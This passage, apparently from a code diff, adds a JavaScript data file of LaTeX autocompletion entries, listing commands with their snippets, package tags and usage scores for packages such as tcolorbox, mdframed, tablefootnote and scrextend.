score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tcolorbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tcolorbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tcolorbox-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tcolorbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tcolorbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tcolorbox-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tcolorbox-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tcolorbox-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tcolorbox-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tcolorbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tcolorbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tcolorbox-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tcolorbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tcolorbox-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tcolorbox-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tcolorbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tcolorbox-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tcolorbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tcolorbox-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tcolorbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tcolorbox-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tcolorbox-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tcolorbox-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tcolorbox-cmd', + score: 0.2864294797053033, + }, + ], + vmargin: [ + { + caption: '\\setmargins{}', + snippet: '\\setmargins{$1}', + meta: 'vmargin-cmd', + score: 3.138510306083217e-5, + }, + { + caption: '\\setmarginsrb{}{}{}{}{}{}{}{}', + snippet: '\\setmarginsrb{$1}{$2}{$3}{$4}{$5}{$6}{$7}{$8}', + meta: 'vmargin-cmd', + score: 0.0004759508676929243, + }, + { + caption: '\\setpapersize{}', + snippet: '\\setpapersize{$1}', + meta: 'vmargin-cmd', + score: 3.138510306083217e-5, + }, + ], + mdframed: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newmdenv[]{}', + snippet: '\\newmdenv[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.0008776774843208122, + }, + { + caption: '\\surroundwithmdframed[]{}', + snippet: '\\surroundwithmdframed[$1]{$2}', + meta: 'mdframed-cmd', + score: 5.535446508489438e-5, + }, + { + caption: '\\newmdtheoremenv{}{}', + snippet: '\\newmdtheoremenv{$1}{$2}', + meta: 'mdframed-cmd', + score: 3.558785984219631e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'mdframed-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'mdframed-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'mdframed-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'mdframed-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'mdframed-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'mdframed-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mdframed-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'mdframed-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'mdframed-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'mdframed-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'mdframed-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mdframed-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'mdframed-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'mdframed-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'mdframed-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'mdframed-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'mdframed-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mdframed-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'mdframed-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'mdframed-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'mdframed-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'mdframed-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mdframed-cmd', + score: 0.008565354665444157, + }, + ], + cancel: [ + { + caption: '\\cancel{}', + snippet: '\\cancel{$1}', + meta: 'cancel-cmd', + score: 0.00017782514657538044, + }, + { + caption: '\\cancelto{}{}', + snippet: '\\cancelto{$1}{$2}', + meta: 'cancel-cmd', + score: 7.809089624140706e-5, + }, + ], + textcase: [ + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'textcase-cmd', + score: 2.341195220791228, + }, + ], + libertine: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'libertine-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'libertine-cmd', + score: 0.008565354665444157, + }, + ], + flushend: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'flushend-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'flushend-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'flushend-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'flushend-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'flushend-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'flushend-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'flushend-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'flushend-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'flushend-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'flushend-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flushend-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'flushend-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'flushend-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'flushend-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'flushend-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flushend-cmd', + score: 0.008565354665444157, + }, + ], + psfrag: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psfrag-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'psfrag-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'psfrag-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'psfrag-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'psfrag-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'psfrag-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'psfrag-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'psfrag-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'psfrag-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'psfrag-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psfrag-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'psfrag-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psfrag-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'psfrag-cmd', + score: 0.004649150613625593, + }, + ], + tablefootnote: [ + { + caption: '\\tablefootnote{}', + snippet: '\\tablefootnote{$1}', + meta: 'tablefootnote-cmd', + score: 0.00017554048326570823, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'tablefootnote-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'tablefootnote-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'tablefootnote-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tablefootnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tablefootnote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tablefootnote-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tablefootnote-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tablefootnote-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tablefootnote-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tablefootnote-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tablefootnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tablefootnote-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tablefootnote-cmd', + score: 0.021170869458413965, + }, + ], + amstext: [ + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'amstext-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'amstext-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'amstext-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'amstext-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amstext-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amstext-cmd', + score: 0.0063276692758974925, + }, + ], + units: [ + { + caption: '\\unitfrac{}{}', + snippet: '\\unitfrac{$1}{$2}', + meta: 'units-cmd', + score: 0.0009264866770139672, + }, + { + caption: '\\unitfrac[]{}{}', + snippet: '\\unitfrac[$1]{$2}{$3}', + meta: 'units-cmd', + score: 0.0009264866770139672, + }, + { + caption: '\\unit[]{}', + snippet: '\\unit[$1]{$2}', + meta: 'units-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\unit{}', + snippet: '\\unit{$1}', + meta: 'units-cmd', + score: 0.028299796173135428, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'units-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'units-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'units-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'units-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'units-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'units-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'units-cmd', + score: 0.0018011350423659288, + }, + ], + scrextend: [ + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'scrextend-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'scrextend-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\scriptsize', + snippet: '\\scriptsize', + meta: 'scrextend-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\scriptsize{}', + snippet: '\\scriptsize{$1}', + meta: 'scrextend-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'scrextend-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\Large', + snippet: '\\Large', + meta: 'scrextend-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\Large{}', + snippet: '\\Large{$1}', + meta: 'scrextend-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\and', + snippet: '\\and', + meta: 'scrextend-cmd', + score: 0.09847866956528724, + }, + { + caption: '\\LARGE', + snippet: '\\LARGE', + meta: 'scrextend-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\LARGE{}', + snippet: '\\LARGE{$1}', + meta: 'scrextend-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\subtitle{}', + snippet: '\\subtitle{$1}', + meta: 'scrextend-cmd', + score: 0.01803265454797817, + }, + { + caption: '\\large', + snippet: '\\large', + meta: 'scrextend-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\large{}', + snippet: '\\large{$1}', + meta: 'scrextend-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'scrextend-cmd', + score: 0.04725806985998919, + }, + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'scrextend-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'scrextend-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\small', + snippet: '\\small', + meta: 'scrextend-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'scrextend-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\huge', + snippet: '\\huge', + meta: 'scrextend-cmd', + score: 0.04229832859754922, + }, + { + caption: '\\huge{}', + snippet: '\\huge{$1}', + meta: 'scrextend-cmd', + score: 0.04229832859754922, + }, + { 